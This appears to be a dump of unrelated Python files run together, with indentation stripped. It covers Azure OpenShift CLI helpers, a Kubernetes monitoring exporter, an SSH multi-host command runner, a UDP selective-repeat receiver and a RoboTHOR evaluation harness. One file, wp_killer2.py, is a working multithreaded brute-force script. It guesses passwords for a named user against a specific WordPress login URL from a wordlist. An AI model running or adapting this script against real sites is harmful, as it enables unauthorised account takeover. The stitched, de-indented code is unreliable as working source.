"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
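    # Normalize the workspace resource ID: ensure a single leading slash and strip any
    # trailing slash. Illustrative example (hypothetical ID):
    #   "subscriptions/xxx/resourcegroups/rg/providers/microsoft.operationalinsights/workspaces/ws/"
    #   -> "/subscriptions/xxx/resourcegroups/rg/providers/microsoft.operationalinsights/workspaces/ws"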
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
    # Check whether the cluster already exists, since AAD rotation on OSA is not supported for now
try:
client.get(resource_group_name, name)
except CloudError:
        # Check whether aad_client_app_id, aad_client_app_secret and aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
    # null out the AAD profile and manually set the master pool name, otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
|
wp_killer2.py
|
from bhp3_class.web import get_words
from collections import deque
from io import BytesIO
from lxml import etree
import requests
import sys
import threading
import time
EXTENSIONS = ['.php', '.bak', '.orig', '.inc']
SUCCESS = 'Welcome to WordPress!'
WORDLIST = '/Users/jtimarnold/Downloads/cain.txt'
def get_params(content):
params = dict()
parser = etree.HTMLParser()
tree = etree.parse(BytesIO(content), parser=parser)
for elem in tree.findall('//input'):
name = elem.get('name')
if name:
params[name] = elem.get('value', None)
return params
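# Illustrative return value for a stock wp-login.php form (field names follow the standard
# WordPress login form; actual keys and values depend on the target page):
# {'log': '', 'pwd': '', 'wp-submit': 'Log In', 'redirect_to': '...', 'testcookie': '1'}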
class Bruter:
def __init__(self, username, url):
self.username = username
self.url = url
self.found = False
print(f'\nBrute Force Attack beginning on {url}.\n')
print("Finished the setup where username = %s\n" % username)
def run_bruteforce(self, passwords):
for _ in range(10):
t = threading.Thread(target=self.web_bruter, args=(passwords,))
t.start()
def web_bruter(self, passwords):
session = requests.Session()
while True:
time.sleep(5)
try:
brute = passwords.popleft()
except IndexError:
print('Thread quits with no match.')
sys.exit()
print(f'Trying username/password {self.username}/{brute:<10}')
resp0 = session.get(self.url)
params = get_params(resp0.content)
params['log'] = self.username
params['pwd'] = brute
resp1 = session.post(self.url, data=params)
if SUCCESS in resp1.content.decode():
self.found = True
print(f"\nBruteforcing successful.")
print("Username is %s" % self.username)
print("Password is %s\n" % brute)
passwords.clear()
print('done: now cleaning up.')
if __name__ == '__main__':
url = "http://boodelyboo.com/wordpress/wp-login.php"
words = get_words(WORDLIST)
b = Bruter('tiarno', url)
b.run_bruteforce(deque(words))
|
WaitingService.py
|
from time import sleep
from datetime import datetime
from Common.Configuration.ConfigurationService import ConfigurationService
import threading
import time
class WaitingService:
def __init__(self, configurationService: ConfigurationService):
self.isCancelled = True
self.configurationService = configurationService
self._update_seconds_between()
thread = threading.Thread(target=self._wait, name='waitingService')
thread.start()
def start(self, action):
self.isCancelled = False
self._update_seconds_between()
self.action = action
def cancel(self):
self.isCancelled = True
sleep(0.6)
def _update_seconds_between(self):
self.secondsBetween = self.configurationService.get_records_seconds_between()
def _wait(self):
while True:
while self.isCancelled:
sleep(0.5)
secondsLeft = self._how_many_seconds_should_wait()
waitedFullTime = self._wait_this_time(secondsLeft)
if waitedFullTime:
self.action()
def _how_many_seconds_should_wait(self) -> int:
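        # Wait until the next multiple of secondsBetween. Illustrative example: with
        # secondsBetween=60 and time.time() landing 37 seconds into a minute, this
        # returns 23 so the action fires on the next minute boundary.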
timeInSeconds = int(time.time())
howLongShouldWait = self.secondsBetween - timeInSeconds % self.secondsBetween
return howLongShouldWait
def _wait_this_time(self, secondsLeft: int) -> bool:
secondsBetweenSettingWhenStarted = self.secondsBetween
while secondsLeft > 0:
sleep(1)
if self.isCancelled or self.secondsBetween != secondsBetweenSettingWhenStarted:
return False
secondsLeft -= 1
return True
|
extended-monitoring.py
|
#!/usr/bin/env python3
# Copyright 2021 Flant JSC
# Licensed under the Deckhouse Platform Enterprise Edition (EE) license.
# See https://github.com/deckhouse/deckhouse/blob/main/ee/LICENSE
from concurrent.futures.thread import ThreadPoolExecutor
from itertools import chain
from threading import Thread
from time import sleep
import logging
import kubernetes
import copy
import sys
from abc import ABC, abstractmethod
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
kubernetes.config.load_incluster_config()
logging.basicConfig(format='[%(asctime)s] - %(message)s', level=logging.INFO)
EXTENDED_MONITORING_ANNOTATION_THRESHOLD_PREFIX = "threshold.extended-monitoring.flant.com/"
EXTENDED_MONITORING_ENABLED_ANNOTATION = "extended-monitoring.flant.com/enabled"
DEFAULT_SERVER_ADDRESS = '0.0.0.0'
DEFAULT_PORT = 8080
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
class Annotated(ABC):
default_thresholds = {}
def __init__(self, namespace, name, kube_annotations):
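        # Illustrative annotations this constructor understands (values are examples only):
        #   extended-monitoring.flant.com/enabled: "false"                    -> marks the object as disabled
        #   threshold.extended-monitoring.flant.com/disk-bytes-warning: "90"  -> overrides that default threshold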
self.namespace = namespace
self.name = name
self.enabled = True
if kube_annotations:
if not {EXTENDED_MONITORING_ENABLED_ANNOTATION: "false"}.items() <= kube_annotations.items():
self.thresholds = copy.deepcopy(self.default_thresholds)
for name, value in kube_annotations.items():
if name.startswith(EXTENDED_MONITORING_ANNOTATION_THRESHOLD_PREFIX):
self.thresholds.update(
{name.replace(EXTENDED_MONITORING_ANNOTATION_THRESHOLD_PREFIX, ""): value})
else:
self.enabled = False
else:
self.thresholds = copy.deepcopy(self.default_thresholds)
@classmethod
def list_threshold_annotated_objects(cls, namespace):
for kube_object in cls.list(namespace):
yield cls(namespace, kube_object.metadata.name, kube_object.metadata.annotations)
@property
def formatted(self):
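        # Illustrative exposition output for an enabled Deployment "foo" in namespace "bar"
        # with the default threshold (object names are hypothetical):
        #   extended_monitoring_deployment_enabled{namespace="bar", deployment="foo"} 1
        #   extended_monitoring_deployment_threshold{namespace="bar", threshold="replicas-not-ready", deployment="foo"} 0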
to_return = ""
if self.enabled:
to_return += 'extended_monitoring_{}_enabled{{namespace="{}", {}="{}"}} {}\n'.format(
self.kind.lower(),
self.namespace,
self.kind.lower(),
self.name, 1)
if hasattr(self, "thresholds"):
for k, v in self.thresholds.items():
to_return += 'extended_monitoring_{}_threshold{{namespace="{}", threshold="{}", {}="{}"}} {}\n'.format(
self.kind.lower(),
self.namespace,
k,
self.kind.lower(),
self.name, int(v))
else:
to_return += 'extended_monitoring_{}_enabled{{namespace="{}", {}="{}"}} {}\n'.format(
self.kind.lower(),
self.namespace,
self.kind.lower(),
self.name, 0)
return to_return
@property
@abstractmethod
def kind(self):
pass
@property
@abstractmethod
def api(self):
pass
@classmethod
@abstractmethod
def list(cls, namespace):
pass
class AnnotatedDeployment(Annotated):
kind = "Deployment"
api = kubernetes.client.AppsV1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_deployment(namespace).items
default_thresholds = {
"replicas-not-ready": 0
}
class AnnotatedStatefulSet(Annotated):
kind = "StatefulSet"
api = kubernetes.client.AppsV1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_stateful_set(namespace).items
default_thresholds = {
"replicas-not-ready": 0
}
class AnnotatedDaemonSet(Annotated):
kind = "DaemonSet"
api = kubernetes.client.AppsV1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_daemon_set(namespace).items
default_thresholds = {
"replicas-not-ready": 0
}
class AnnotatedPod(Annotated):
kind = "Pod"
api = kubernetes.client.CoreV1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_pod(namespace).items
default_thresholds = {
"disk-bytes-warning": 85,
"disk-bytes-critical": 95,
"disk-inodes-warning": 85,
"disk-inodes-critical": 90,
"container-throttling-warning": 25,
"container-throttling-critical": 50,
}
class AnnotatedIngress(Annotated):
kind = "Ingress"
api = kubernetes.client.ExtensionsV1beta1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_ingress(namespace).items
default_thresholds = {
"5xx-warning": 10,
"5xx-critical": 20
}
class AnnotatedNode(Annotated):
kind = "Node"
api = kubernetes.client.CoreV1Api()
@classmethod
def list(cls, namespace=None):
return cls.api.list_node().items
default_thresholds = {
"disk-bytes-warning": 70,
"disk-bytes-critical": 80,
"disk-inodes-warning": 85,
"disk-inodes-critical": 90,
"load-average-per-core-warning": 3,
"load-average-per-core-critical": 10,
}
class AnnotatedCronJob(Annotated):
kind = "CronJob"
api = kubernetes.client.BatchV1beta1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_cron_job(namespace).items
KUBERNETES_OBJECTS = (
AnnotatedNode,
)
KUBERNETES_NAMESPACED_OBJECTS = (
AnnotatedDeployment,
AnnotatedStatefulSet,
AnnotatedDaemonSet,
AnnotatedPod,
AnnotatedIngress,
AnnotatedCronJob,
)
corev1 = kubernetes.client.CoreV1Api()
apis = kubernetes.client.ApisApi()
def _list_objects(executor, objects, namespace):
yield from chain.from_iterable(executor.map(lambda k: k.list_threshold_annotated_objects(namespace), objects))
def _get_metrics():
enabled_nses = []
quantity = 0
    # iterate over namespaced objects in Namespaces explicitly enabled via the annotation
ns_list = (
ns.metadata.name for ns in corev1.list_namespace().items
if ns.metadata.annotations
and EXTENDED_MONITORING_ENABLED_ANNOTATION in ns.metadata.annotations.keys()
)
response = """# HELP extended_monitoring_annotations Extended monitoring annotations
# TYPE extended_monitoring_annotations gauge\n"""
with ThreadPoolExecutor(max_workers=8) as executor:
def _list_in_ns(ns):
enabled_nses.append('\nextended_monitoring_enabled{{namespace="{}"}} 1'.format(ns))
yield from _list_objects(executor, KUBERNETES_NAMESPACED_OBJECTS, ns)
for annotated_object in chain.from_iterable(executor.map(_list_in_ns, ns_list)):
response += annotated_object.formatted
quantity += 1
for annotated_object in _list_objects(executor, KUBERNETES_OBJECTS, None):
response += annotated_object.formatted
quantity += 1
response += '\n'.join(enabled_nses)
quantity += len(enabled_nses)
return response, quantity
class GetHandler(BaseHTTPRequestHandler):
_response = ""
@classmethod
def get_metrics(cls):
        # assigning to a str attribute is atomic in Python, so readers never see a partial value
cls._response, quantity = _get_metrics()
logging.info('Metrics are collected successfully. Batches quantity: {}'.format(quantity))
@classmethod
def loop_get_metrics(cls):
while 1:
try:
cls.get_metrics()
except Exception as loop_err:
logging.info(str(loop_err))
sleep(30)
def do_GET(self):
if self.path == "/ready":
apis.get_api_versions()
self.send_response(200)
self.end_headers()
return
if self.path == "/healthz":
self.send_response(200)
self.end_headers()
return
if self.path == "/metrics":
self.send_response(200)
self.send_header('Content-Type',
'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write(self.__class__._response.encode(encoding="utf-8"))
return
self.send_response(404)
self.end_headers()
if __name__ == '__main__':
server_address = DEFAULT_SERVER_ADDRESS
server_port = DEFAULT_PORT
# Parse host and port
if len(sys.argv) >= 2:
server_address = sys.argv[1]
if len(sys.argv) == 3:
server_port = int(sys.argv[2])
# Get metrics once synchronously before starting web server
GetHandler.get_metrics()
server = ThreadingHTTPServer((server_address, server_port), GetHandler)
try:
# Run metrics renew in background (daemon thread is canceled on the script exit)
Thread(target=GetHandler.loop_get_metrics, daemon=True).start()
logging.info('Starting server')
server.serve_forever()
except Exception as err:
logging.info('Shutting down server')
raise err
|
rcmd.py
|
import paramiko
import threading
import sys
import os
import getpass
def rcmd(host, user='root', passwd=None, port=22, cmds=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=host, port=port, username=user, password=passwd)
stdin, stdout, stderr = ssh.exec_command(cmds)
out = stdout.read()
err = stderr.read()
if out:
print('[%s] \033[32;1mOUT\033[0m:\n%s' % (host, out.decode()))
if err:
print('[%s] \033[31;1mERROR\033[0m:\n%s' % (host, err.decode()))
ssh.close()
if __name__ == '__main__':
if len(sys.argv) != 3:
print('Usage: %s ipfile "commands"' % sys.argv[0])
exit(1)
if not os.path.isfile(sys.argv[1]):
print('No such file %s' % sys.argv[1])
exit(2)
hostfile = sys.argv[1]
cmds = sys.argv[2]
password = getpass.getpass()
with open(hostfile) as fobj:
for line in fobj:
ip = line.strip()
# rcmd(ip, passwd=password, cmds=cmds)
t = threading.Thread(target=rcmd, args=(ip,), kwargs={'passwd': password, 'cmds': cmds})
t.start() # target(*args, **kwargs)
|
sr_receiver.py
|
import time
from collections import deque
from threading import Lock, Condition, Thread
from senders.udt_sender import UDTSender, LossyUDTSender, CorruptingUDTSender
from helpers.logger_utils import get_stdout_logger
from receivers.udt_receiver import UDTReceiver, InterruptableUDTReceiver
from senders.sr_sender import SelectiveRepeatSender
logger = get_stdout_logger('sr_receiver')
class SelectiveRepeatReceiver:
def __init__(self, window_size=4, max_seq_num=-1, loss_prob=0):
self.cnt=0
self.udt_receiver = InterruptableUDTReceiver(UDTReceiver())
self.udt_listening_receiver = InterruptableUDTReceiver(UDTReceiver())
self.current_window = deque([None for _ in range(window_size)])
self.window_size = window_size
self.max_seq_num = max(2 * window_size, max_seq_num)
self.base_seq_num = 0
self.data_queue = deque()
self.data_queue_cv = Condition()
self.done_receiving = False
self.waiting_to_close = False
self.lock = Lock()
self.loss_prob = loss_prob
        self.closing_cv = Condition()
        self.is_listening = False
def start_data_waiter(self):
t = Thread(target=self.wait_for_data)
t.daemon = True
t.start()
def wait_for_data(self):
while not self.done_receiving:
packet, sender_address = self.udt_receiver.receive()
logger.info(f'received {packet.data} from {sender_address}')
udt_sender = CorruptingUDTSender(LossyUDTSender(UDTSender.from_udt_receiver(self.udt_receiver,*sender_address)
, self.loss_prob),0.5)
udt_sender.send_ack(packet.seq_number)
logger.info(f'sent an Ack with seq number {packet.seq_number}'
                    f' to {sender_address}')
self.adjust_window(packet)
def adjust_window(self, packet):
if self.is_in_window(packet.seq_number):
try:
self.current_window[self.get_window_idx(packet.seq_number)] = packet
except IndexError:
wind = [x.data if x is not None else None for x in self.current_window]
logger.error(f'{self.get_window_idx(packet.seq_number)} is out of {wind}|'
f' {self.is_in_window(packet.seq_number)} | base={self.base_seq_num}' )
else:
                logger.error('error again')
else:
logger.debug(f'got {packet.seq_number} out of window')
logger.debug(f'(sr_receiver) : window before adjusting '
f'= {[pkt.data if pkt is not None else None for pkt in self.current_window]} '
f'| base={self.base_seq_num} ({self.cnt})')
shifts = 0
for i, pkt in enumerate(self.current_window):
if pkt is None:
break
with self.data_queue_cv:
self.data_queue.append(pkt)
self.data_queue_cv.notify()
self.current_window[i] = None
shifts += 1
self.current_window.rotate(-shifts)
self.base_seq_num = (self.base_seq_num + shifts) % self.max_seq_num
logger.debug(
f'window after adjusting = {[pkt.data if pkt is not None else None for pkt in self.current_window]} '
f'| base={self.base_seq_num} ({self.cnt})')
self.cnt+=1
with self.data_queue_cv:
self.data_queue_cv.notify()
def get_packet(self):
with self.data_queue_cv:
self.data_queue_cv.wait_for(lambda : len(self.data_queue) > 0)
pkt = self.data_queue.popleft()
logger.info(f'delivering packet with data {pkt.data} to upper layer')
return pkt
@classmethod
def from_sender(cls, sr_sender, window_size=4, max_seq_num=-1, loss_prob=0):
sr_receiver = cls(window_size=window_size, max_seq_num=max_seq_num,loss_prob=loss_prob)
sr_receiver.udt_receiver = InterruptableUDTReceiver(UDTReceiver.from_udt_sender(sr_sender.udt_sender))
return sr_receiver
def listen(self, port):
"""
This sets up the receiver to start listening for incoming connections
on the port passed in as a parameter.
:param port:
"""
self.udt_listening_receiver.bind(port)
self.is_listening = True
def accept(self, callback, **sender_args):
def extended_callback(init_packet, sr_sender):
time.sleep(1)
callback(init_packet, sr_sender)
if not self.is_listening:
raise TypeError('non listening receiver cannot accept connections')
init_packet, sender_address = self.udt_listening_receiver.receive()
logger.info( f'(listener) : received {init_packet.data} from {sender_address}')
udt_sender = UDTSender(*sender_address)
udt_sender.send_ack(init_packet.seq_number)
self.adjust_window(init_packet)
client_thread = Thread(target=extended_callback, args=(init_packet, SelectiveRepeatSender(*sender_address, **sender_args)))
client_thread.daemon = True
client_thread.start()
return client_thread
def close(self):
with self.closing_cv:
while len(self.data_queue) > 0:
self.closing_cv.wait()
        time.sleep(5)  # wait a few seconds in case this is just a pause due to delays
logger.debug('woke up')
if len(self.data_queue) > 0:
self.close()
self.done_receiving = True
logger.debug('closing client')
def is_in_window(self, seq_num):
return seq_num in [i % self.max_seq_num for i in range(self.base_seq_num, self.base_seq_num + self.window_size)]
def get_window_idx(self, seq_num):
seq_num = seq_num if seq_num >= self.base_seq_num else seq_num + self.max_seq_num
return seq_num - self.base_seq_num
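# Hedged usage sketch (not part of the original module): one way the receiver above can be
# driven. The port number and callback are illustrative assumptions, and a matching
# SelectiveRepeatSender must be running on the peer side for any packets to arrive.
def _example_serve(port=9000):
    def handle_client(init_packet, sr_sender):
        logger.info(f'new connection, first packet: {init_packet.data}')

    receiver = SelectiveRepeatReceiver(window_size=4)
    receiver.start_data_waiter()    # background thread that receives, acks and buffers packets
    receiver.listen(port)           # bind the listening UDT receiver to the port
    receiver.accept(handle_client)  # handle the first incoming connection on its own thread
    return receiver.get_packet()    # block until an in-order packet is delivered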
|
_communicator.py
|
import threading as th
import multiprocessing as mp
from modi._communicator_task import CommunicatorTask
from modi._ser_task import SerTask
from modi._can_task import CanTask
from modi._spp_task import SppTask
class Communicator(mp.Process):
def __init__(self, recv_q, send_q, conn_mode, module_uuid):
super().__init__()
params = [recv_q, send_q]
if conn_mode.startswith("b"):
params.append(module_uuid)
self.__task = self.__init_task(conn_mode)(*params)
self.__delay = 0.05 if isinstance(self.__task, SppTask) else 0.001
def __init_task(self, conn_mode):
if conn_mode.startswith("b"):
return SppTask
return CanTask if self.__is_modi_pi() else SerTask
@staticmethod
def __is_modi_pi():
return CommunicatorTask.is_on_pi() and \
not CommunicatorTask.is_network_module_connected()
def run(self):
self.__task.open_conn()
read_thread = th.Thread(
target=self.__task.run_read_data, args=(self.__delay,)
)
read_thread.daemon = True
read_thread.start()
write_thread = th.Thread(
target=self.__task.run_write_data, args=(self.__delay,)
)
write_thread.daemon = True
write_thread.start()
read_thread.join()
write_thread.join()
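# Hedged usage sketch (not part of the original module): wiring the Communicator above to a
# pair of queues. conn_mode="ser" is an illustrative choice that selects the serial task on a
# non-Raspberry-Pi host; a physical MODI network module must be attached for run() to work.
if __name__ == "__main__":
    recv_q, send_q = mp.Queue(), mp.Queue()
    communicator = Communicator(recv_q, send_q, conn_mode="ser", module_uuid=None)
    communicator.daemon = True
    communicator.start()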
|
challenge.py
|
from typing import Dict, Any
import os
import sys
import glob
import json
import yaml
import time
import gzip
import random
import logging
import multiprocessing as mp
import queue
import threading
import ai2thor.controller
import ai2thor.util.metrics
from robothor_challenge.startx import startx
logger = logging.getLogger(__name__)
ch = logging.StreamHandler(sys.stdout)
ch.flush = sys.stdout.flush
ch.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s [%(levelname)s] %(name)s - %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
ALLOWED_ACTIONS = ["MoveAhead", "RotateRight", "RotateLeft", "LookUp", "LookDown", "Stop"]
def get_object_by_type(event_objects, object_type):
for obj in event_objects:
if obj['objectId'].split("|")[0] == object_type:
return obj
return None
class RobothorChallenge:
def __init__(self, cfg_file, agent_class, agent_kwargs, render_depth=False):
self.agent_class = agent_class
self.agent_kwargs = agent_kwargs
self.config = self.load_config(cfg_file, render_depth)
self.setup_env()
self.controller_kwargs = {
"commit_id": self.config["thor_build_id"],
"width": self.config["width"],
"height": self.config["height"],
**self.config["initialize"]
}
self.current_scene = None
self.reachable_positions_per_scene = {}
@staticmethod
def load_config(cfg_file, render_depth):
logger.info("Loading configuration from: %s" % cfg_file)
with open(cfg_file, "r") as f:
config = yaml.safe_load(f.read())
if render_depth:
config["initialize"]["renderDepthImage"] = True
return config
@staticmethod
def setup_env():
if "DISPLAY" not in os.environ:
xthread = threading.Thread(target=startx)
xthread.daemon = True
xthread.start()
import time
# XXX change this to use xdpyinfo
time.sleep(4)
@staticmethod
def load_split(dataset_dir, split):
split_paths = os.path.join(dataset_dir, split, "episodes", "*.json.gz")
split_paths = sorted(glob.glob(split_paths))
episode_list = []
dataset = {}
for split_path in split_paths:
logger.info("Loading: {path}".format(path=split_path))
with gzip.GzipFile(split_path, "r") as f:
episodes = json.loads(f.read().decode("utf-8"))
# Build a dictionary of the dataset indexed by scene, object_type
curr_scene = None
curr_object = None
points = []
scene_points = {}
for data_point in episodes:
if curr_object != data_point["object_type"]:
scene_points[curr_object] = points
curr_object = data_point["object_type"]
points = []
if curr_scene != data_point["scene"]:
dataset[curr_scene] = scene_points
curr_scene = data_point["scene"]
scene_points = {}
points.append(data_point)
episode_list += episodes
return episode_list, dataset
@staticmethod
def inference_worker(
worker_ind: int,
in_queue: mp.Queue,
out_queue: mp.Queue,
agent_class: Any,
agent_kwargs: Dict[str, Any],
controller_kwargs: Dict[str, Any],
max_steps: int,
test: bool
):
agent = agent_class(**agent_kwargs)
controller = ai2thor.controller.Controller(**controller_kwargs)
while True:
try:
e = in_queue.get(timeout=1)
except queue.Empty:
break
logger.info("Task Start id:{id} scene:{scene} target_object:{object_type} initial_position:{initial_position} rotation:{initial_orientation}".format(**e))
controller.initialization_parameters["robothorChallengeEpisodeId"] = e["id"]
print(e["scene"])
controller.reset(e["scene"])
teleport_action = {
"action": "TeleportFull",
**e["initial_position"],
"rotation": {"x": 0, "y": e["initial_orientation"], "z": 0},
"horizon": e["initial_horizon"],
"standing": True
}
controller.step(action=teleport_action)
total_steps = 0
agent.reset()
episode_metrics = {
"trajectory" : [{
**e["initial_position"],
"rotation" : float(e["initial_orientation"]),
"horizon" : e["initial_horizon"]
}],
"actions_taken" : []
}
stopped = False
while total_steps < max_steps and stopped is False:
total_steps += 1
event = controller.last_event
event.metadata.clear()
action = agent.act({
"object_goal" : e["object_type"],
"depth" : event.depth_frame,
"rgb" : event.frame
})
if action not in ALLOWED_ACTIONS:
raise ValueError("Invalid action: {action}".format(action=action))
logger.info("Agent action: {action}".format(action=action))
event = controller.step(action=action)
episode_metrics["trajectory"].append({
**event.metadata["agent"]["position"],
"rotation": event.metadata["agent"]["rotation"]["y"],
"horizon": event.metadata["agent"]["cameraHorizon"]
})
episode_metrics["actions_taken"].append({
"action": action,
"success": event.metadata["lastActionSuccess"]
})
stopped = action == "Stop"
if not test:
target_obj = get_object_by_type(event.metadata["objects"], e["object_type"])
assert target_obj is not None
target_visible = target_obj["visible"]
episode_metrics["success"] = stopped and target_visible
if not test:
episode_result = {
"path": episode_metrics["trajectory"],
"shortest_path": e["shortest_path"],
"success": episode_metrics["success"]
}
else:
episode_result = None
out_queue.put((e["id"], episode_metrics, episode_result))
controller.stop()
print(f"Worker {worker_ind} Finished.")
